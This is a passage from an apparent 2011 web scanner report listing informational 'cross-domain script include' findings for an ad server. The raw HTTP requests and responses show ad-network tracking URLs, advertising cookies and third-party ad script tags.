llbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=286380400" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.6. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=45832566427998250&clkurl=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdArgyqDU5E6D-uDKoNTkToP99ronZfgYdlSsYda6b2ziXvT7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAPQ8BAgUCAAQAAAAA8CIKmgAAAAA./cnd=!Qg9ejQiQmQMQxskKGAAg0ccBKEsxERukQU1E6D9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAWAt70-0TajcL6K7sQe2vMHtC9fq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyvwLF7MoEVJ26YNwSnGTXHBTcukg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680578&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662578710&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662578715&frm=1&adk=2614322350&ga_vid=1466159819.1303662579&ga_sid=1303662579&ga_hid=97024423&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUWF_DD0u2mL445Kc9YoToMfDv8fQDA3gBY2BgEGZg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36H34QQnHKuDRxQuTagvu9AfS5wfRLut3Hqk7DTxqWv_eTOTbj0tZ.cUYtT7oTwYpxyxxY8wil39KsgTrkZC9hxy9m24pSb_tATt1zHStxypro45abdVMQpV1nmy8A0OZSB1eEJA6NOHgPDR6H_QACKv_wAxmoGJn8bBpYX3gyMWkwMDJeeweIoTXlWEFDOCirHCJR7AJdTklIHshlx29ktBJRn8N2cwcDAAUwsOxmBihkCbzEyASkGA0YGAQYGBTOw4NICsCBLJiMrUI4lhImVkQ3IkN_FyMAFT2MgwxgAToqJtQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUT9qLjz2Zm9NiEFg3paXYGLcX2UIDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HhNc1nHJ.E0Jwyrk2cEDl2oBmfgea6QI3U8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8GZgmhzKwOjxhYNTJY2D4KPQfCEBxmx_AWM3A5G_DwPLCm4FRi4mB4dIzWBylKc8KAspZQeUYgXIP4HJKUupANiNuO7uFgPIMvpszGBg4gAlpJyNQMUPgLUYmIMVgwMggyMCgYAYWXFoAFmTJZGQFyrGEMLEysgEZ8rsYGbig6e86yCwGBgAWjZB.; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:29:38 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4055
Date: Sun, 24 Apr 2011 16:29:37 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1827594393?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUqGt7rLogJrjJsgIfEZCuWJKDi4lnZW8sdXNhLHQsMTMwMzY2MjU3ODM5MSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1adVQtYW1abVptWm01UHdBQUFFQXpNd2RBcmd5cURVNUU2RC11REtvTlRrVG9QOTlyb25aZmdZZGxTc1lkYTZiMnppWHZUN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQVBROEJBZ1VDQUFRQUFBQUE4Q0lLbWdBQUFBQS4vY25kPSFRZzllalFpUW1RTVF4c2tLR0FBZzBjY0JLRXN4RVJ1a1FVMUU2RDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJBV0F0NzAtMFRhamNMNks3c1FlMnZNSHRDOWZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDWk1BQ0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0Fib3Q4NnF3WTZ5aHRFQiZudW09MSZzaWc9QUdpV3F0eXZ3TEY3TW9FVkoyNllOd1NuR1RYSEJUY3VrZyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=927408272" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.7. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=9862538590095938&clkurl=http://ib.adnxs.com/click/cD0K16NwzT9xPQrXo3DNPwAAAEAzMwdA5QzFHW-y8D_lDMUdb7LwP7zkV1ZoqVQpSsYda6b2ziUgS7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAKAcBAgUCAAQAAAAA3CHDJQAAAAA./cnd=!chDNzwiQmQMQxskKGAAg0ccBKEsxV_RVCW-y8D9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBSMEqIEu0TdSiA829sQf_uKGCDNfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgC5gHAAgTIAoXSzwqoAwHoA7wB6AOUAvUDAAAAxIAG6LfOqsGOsobRAQ%26num%3D1%26sig%3DAGiWqtwu_xZ0ijvOML45dyfc2hZbxHNbcg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679347&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661347006&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303661347010&frm=1&adk=2614322350&ga_vid=708894165.1303661347&ga_sid=1303661347&ga_hid=955027229&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU.F3RuHvJzBu.z.YBaeVDIgZe2bIDA3gBY2BgEGRg6lzCwJLdxsDI.52B4YYLAwMDJwMDo36HhPttqFwLUO4nUM4NIWenjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FeYHzDc2T5jATtOfTNsW3HKTX_oiVuuYyVuOVNdnHLTbirilKss82VgmhzKwOrwhIFRJ4.B4aPQfyAAxUN.AGM1A5O_DQPLC28GRi0mBoZLz2DxkKY8KwgoZwWVYwTKPYDLKUmpA9mMuO3sFgLKM_huzmBg4ABG.k5GoGKGwFuMTECKwYCRgY.BQcEMLLi0ACzIksnICpRjCWFiZWQDMuR3MTJwgdOKw4dXILMYGAAfVn6K

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU4Ho4GhMNTO2javi9DkYkdWBJL5gDA3gBY2BgEGJg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HawMHVK4NKPcdKOcCl5Nwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiJOucoyXwamyaEMrA5PGBh18hgYPgr9BwJQHOUHMFYzMPnbMLC88GZg1GJiYLj0DBZHacqzgoByVlA5RqDcA7ickpQ6kM2I285uIaA8g._mDAYGDmCC2MkIVMwQeIuRCUgxGDAy8DMwKJiBBZcWgAVZMhlZgXIsIUysjGxAhvwuRgYueDoCGcYAAOS4gxQ-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:09:06 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4053
Date: Sun, 24 Apr 2011 16:09:06 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=108323742?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU8WaL.ixUWA6VYH0NyC0NoIF0VH9nZW8sdXNhLHQsMTMwMzY2MTM0NjgyNSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL2NEMEsxNk53elQ5eFBRclhvM0ROUHdBQUFFQXpNd2RBNVF6RkhXLXk4RF9sRE1VZGI3THdQN3prVjFab3FWUXBTc1lkYTZiMnppVWdTN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUtBY0JBZ1VDQUFRQUFBQUEzQ0hESlFBQUFBQS4vY25kPSFjaEROendpUW1RTVF4c2tLR0FBZzBjY0JLRXN4Vl9SVkNXLXk4RDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJTTUVxSUV1MFRkU2lBODI5c1FmX3VLR0NETmZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDNWdIQUFnVElBb1hTendxb0F3SG9BN3dCNkFPVUF2VURBQUFBeElBRzZMZk9xc0dPc29iUkFRJm51bT0xJnNpZz1BR2lXcXR3dV94WjBpanZPTUw0NWR5ZmMyaFpieEhOYmNnJmNsaWVudD1jYS1wdWItNjg4ODA2NTY2ODI5MjYzOCZhZHVybD0K/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=215239555" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.8. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=6731433467939496&clkurl=http://ib.adnxs.com/click/CtejcD0Ktz8K16NwPQq3PwAAAEAzMwdAe0ykNJvH5j97TKQ0m8fmP4tkw7_c_Kt8SsYda6b2ziXRVLRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA8A4BAgUCAAQAAAAAByScegAAAAA./cnd=!XRBRyQiQmQMQxskKGAAg0ccBKEsxQyNyhZvH5j9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBuDo_0VS0Te6lHJbulQfVl6mfAtfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCWsACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwKw2NSpsBuz7_grX_7oWb99Jw51w%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681828&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663828367&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663828373&frm=1&adk=2614322350&ga_vid=2143277132.1303663828&ga_sid=1303663828&ga_hid=1947261372&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUAsM9TbmlvrBQFYLaCizF.1a6GKYDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35Hktt1nHIRXtdwyvlNCMEp59rAAZVrA9r3HWifC9w.CffbOPVJ2Gnj0td.cucmXPraT86oxSl3QngxTrljCx7hlDv6VRCn3IwF7LjlbFtxyk1_6IlbrmMlbjlTXZxy024q4pSrLPNlYJocysDq8ISBUSePgeGj0H8gAMV7fgBjNQOTvw0DywtvBkYtJgaGS89gcZSmPCsIyGbEbW63EFCewXdzBgMDBzAh7WQEKmYIvMXIBKQYDBgZgNIKZmDBpQVgQZZMRlagHEsIEysjG5Ahv4uRgQec_rKdjoPMYmAAAPD5kmE-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUhvvA3uMYtZiectC07uf2QDyvEasDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HdswpnHJJbtdxykV4XcMp5zchBKecawMHVK4N6JbvQLe4wN0i4X4bpz4JO21c.tpP7tyES1_7yRm1OOVOCC_GKXdswSOccke_CuKUm7GAHbecbStOuekPPXHLdazELWeqi1Nu2k1FnHKVZb4MTJNDGVgdnjAw6uQxMHwU.g8EoDSRH8BYDYwTRtx6u4WA8gy.mzMYGDiACWknI1AxQ.AtRiYgxWDAyCDMwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZeODpD2QYAwCGTZPB; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:50:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4055
Date: Sun, 24 Apr 2011 16:50:27 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1534348375?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU8U3PQ2ZpisS_seOpO7ZDo785pE5nZW8sdXNhLHQsMTMwMzY2MzgyODE3MCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0N0ZWpjRDBLdHo4SzE2TndQUXEzUHdBQUFFQXpNd2RBZTB5a05Kdkg1ajk3VEtRMG04Zm1QNHRrdzdfY19LdDhTc1lkYTZiMnppWFJWTFJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQThBNEJBZ1VDQUFRQUFBQUFCeVNjZWdBQUFBQS4vY25kPSFYUkJSeVFpUW1RTVF4c2tLR0FBZzBjY0JLRXN4UXlOeWhadkg1ajlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJ1RG9fMFZTMFRlNmxISmJ1bFFmVmw2bWZBdGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDV3NBQ0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0Fib3Q4NnF3WTZ5aHRFQiZudW09MSZzaWc9QUdpV3F0d0t3Mk5TcHNCdXo3X2dyWF83b1diOTlKdzUxdyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=896531071" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.9. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
